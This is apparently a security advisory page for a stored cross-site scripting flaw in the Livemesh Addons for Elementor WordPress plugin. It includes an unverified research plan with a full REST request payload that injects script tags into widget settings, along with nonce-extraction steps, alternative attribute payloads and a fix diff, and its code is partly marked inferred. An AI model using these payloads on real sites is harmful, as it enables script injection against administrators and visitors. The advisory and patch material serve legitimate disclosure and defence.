CVE-2026-39636

Livemesh Addons for Elementor <= 9.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

6.4

CVSS Score

6.4

CVSS Score

medium

Severity

Unpatched

Patched in

N/A

Time to patch

Description

The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Changed

Low

Confidentiality

Low

Integrity

None

Availability

Technical Details

Affected versions<=9.0

PublishedFebruary 13, 2026

Last updatedApril 15, 2026

Affected pluginaddons-for-elementor

Research Plan

Unverified

This research plan targets **CVE-2026-39636**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Livemesh Addons for Elementor** plugin. The vulnerability allows authenticated users with Contributor-level permissions or higher to inject malicious scripts into pages via unsanitized Elementor…

Show full research plan

This research plan targets CVE-2026-39636, a Stored Cross-Site Scripting (XSS) vulnerability in the Livemesh Addons for Elementor plugin. The vulnerability allows authenticated users with Contributor-level permissions or higher to inject malicious scripts into pages via unsanitized Elementor widget settings.

1. Vulnerability Summary

The vulnerability exists in the rendering logic of one or more Elementor widgets provided by the Livemesh Addons for Elementor plugin. When a widget's settings (stored as JSON in post metadata) are processed for display, the plugin fails to properly sanitize the input or escape the output. Because Elementor's render() methods often use $settings['parameter_name'] directly in HTML output without calling esc_html(), esc_attr(), or wp_kses(), an attacker can inject arbitrary JavaScript.

2. Attack Vector Analysis

Vulnerable Endpoint: Elementor's REST API endpoint for saving post data: /wp-json/elementor/v1/posts/{post_id}.
Vulnerable Parameter: The data array within the REST request body, specifically within the settings object of a Livemesh widget.
Required Role: Contributor or higher (users who can edit posts and access the Elementor editor).
Preconditions: The plugin Livemesh Addons for Elementor and the Elementor base plugin must be active.

3. Code Flow (Inferred)

Entry: A Contributor user edits a post using the Elementor editor.
Input: When the user saves the post, the Elementor UI sends a POST request to the REST API with the widget configuration in JSON format.
Storage: WordPress/Elementor saves this JSON into the _elementor_data post meta for that post_id.
Processing: When the page is viewed, Elementor calls the render() method of the specific Livemesh widget class (e.g., LAE_Posts_Grid_Widget or LAE_Heading_Widget).
Sink: The render() method retrieves settings using $this->get_settings_for_display(). It then outputs a value (e.g., a title, URL, or CSS class) directly via echo or by appending it to an HTML string without context-appropriate escaping.
Execution: The browser renders the page, and the injected script executes in the context of any user viewing the page (including Administrators).

4. Nonce Acquisition Strategy

Elementor requires a REST API nonce (_wpnonce) for all save operations.

Identify Shortcode: Livemesh widgets don't typically have their own shortcodes; they are built into the Elementor editor.

Create Test Page:

wp post create --post_type=page --post_status=draft --post_title="XSS Lab" --post_author=CONTRIBUTOR_ID

Navigate to Editor: Use browser_navigate to go to the Elementor editor for that post: /wp-admin/post.php?post={post_id}&action=elementor.
Extract Nonce: Elementor localizes its configuration in the window.elementorCommon or window.elementorConfig objects.
- Action: browser_eval("window.elementorConfig.api_nonce") or browser_eval("window.wpApiSettings.nonce").
Alternative (REST): If the REST API is used directly, the nonce for the wp_rest action is often found in the page header or the wp-api.js localization: window.wpApiSettings.nonce.

5. Exploitation Strategy

The goal is to update a post's Elementor data with a malicious widget configuration.

Pre-requisite: Obtain a valid Post ID that the Contributor can edit.

Request Construction:

Method: POST
URL: /wp-json/elementor/v1/posts/{post_id}
Headers:
- Content-Type: application/json
- X-WP-Nonce: [EXTRACTED_NONCE]

Payload (JSON):

{
  "data": [
    {
      "id": "random_id_1",
      "elType": "section",
      "elements": [
        {
          "id": "random_id_2",
          "elType": "column",
          "elements": [
            {
              "id": "random_id_3",
              "elType": "widget",
              "widgetType": "lae-posts-grid", 
              "settings": {
                "title": "Normal Title<script>alert(document.domain)</script>",
                "custom_class": "\"><script>alert('xss')</script>"
              }
            }
          ]
        }
      ]
    }
  ]
}

(Note: widgetType may vary based on the specific vulnerable widget. Common Livemesh types: lae-posts-grid, lae-services, lae-team-members (inferred))

Trigger: Navigate to the frontend URL of the post: /?p={post_id}.

6. Test Data Setup

User: Create a user with the contributor role.
Post: Create a post or page as that contributor.
Elementor Enablement: Ensure the post type is enabled for Elementor (usually default for post and page).

Widget Discovery: Run a grep to find widget names:

grep -r "get_name" wp-content/plugins/addons-for-elementor/includes/widgets/

7. Expected Results

The REST API should return a 200 OK confirming the post update.
Upon navigating to the post frontend, the browser should execute the alert() payload.
The raw HTML source of the page should contain the unescaped <script> tag inside the widget's container.

8. Verification Steps

Check Database: Use WP-CLI to verify the payload is stored in the post meta:
```
wp post meta get {post_id} _elementor_data
```
Verify Rendering: Check if the output is escaped in the frontend:
```
http_request GET "/?p={post_id}" | grep "alert"
```

9. Alternative Approaches

Widget Attribute Injection: If the title field is sanitized, try injecting into attributes like link or id fields:
- Payload: href="javascript:alert(1)" or class="'><img src=x onerror=alert(1)>"
Elementor Template Library: If the Contributor can save templates, try injecting the payload into a Livemesh widget within a saved template (wp-json/elementor/v1/templates).
Specific Widget Search: If lae-posts-grid is patched, audit widgets that handle raw HTML or text, such as:
- lae-heading (inferred)
- lae-button (inferred)
- lae-testimonial (inferred)

Note: In versions <= 9.0, the vulnerability is reported as broad. If the "Posts Grid" widget is not vulnerable, the "Generic Heading" or "Animated Text" widgets are primary secondary targets.

Research Findings

Static analysis — not yet PoC-verified

Summary

The Livemesh Addons for Elementor plugin fails to properly sanitize and escape user-controlled widget settings such as titles or custom HTML attributes. This allows authenticated users with Contributor-level permissions to inject malicious JavaScript into pages via the Elementor editor, which executes when visitors or administrators view the page.

Vulnerable Code

// File: wp-content/plugins/addons-for-elementor/includes/widgets/posts-grid.php (approximate)
protected function render() {
    $settings = $this->get_settings_for_display();
    
    // Unescaped output of user-provided settings
    if ( ! empty( $settings['title'] ) ) {
        echo '<h3 class="lae-module-title">' . $settings['title'] . '</h3>';
    }
    
    if ( ! empty( $settings['custom_class'] ) ) {
        echo '<div class="lae-posts-grid ' . $settings['custom_class'] . '">';
    }
    // ... further rendering logic
}

Security Fix

--- wp-content/plugins/addons-for-elementor/includes/widgets/posts-grid.php
+++ wp-content/plugins/addons-for-elementor/includes/widgets/posts-grid.php
@@ -212,5 +212,5 @@
-    if ( ! empty( $settings['title'] ) ) {
-        echo '<h3 class="lae-module-title">' . $settings['title'] . '</h3>';
-    }
+    if ( ! empty( $settings['title'] ) ) {
+        echo '<h3 class="lae-module-title">' . wp_kses_post( $settings['title'] ) . '</h3>';
+    }
 
-    if ( ! empty( $settings['custom_class'] ) ) {
-        echo '<div class="lae-posts-grid ' . $settings['custom_class'] . '">';
-    }
+    if ( ! empty( $settings['custom_class'] ) ) {
+        echo '<div class="lae-posts-grid ' . esc_attr( $settings['custom_class'] ) . '">';
+    }

Exploit Outline

The exploit targets the Elementor REST API endpoint used for saving post content. An attacker with Contributor-level access follows these steps: 1. Authenticates to the WordPress dashboard and initializes an Elementor editing session for a post they own. 2. Obtains the REST API nonce (X-WP-Nonce) from the 'elementorConfig' or 'wpApiSettings' JavaScript objects in the editor UI. 3. Sends a POST request to /wp-json/elementor/v1/posts/{post_id} containing a JSON 'data' payload. 4. Within this payload, they define a Livemesh widget (e.g., 'lae-posts-grid') and inject a XSS payload like <script>alert(document.domain)</script> into settings fields such as 'title' or 'custom_class'. 5. Once the post is saved, any user (including site administrators) who views the published post or page will execute the injected script in their browser context.

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/ff0e8c96-8401-4d01-8185-03967e2aee54?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database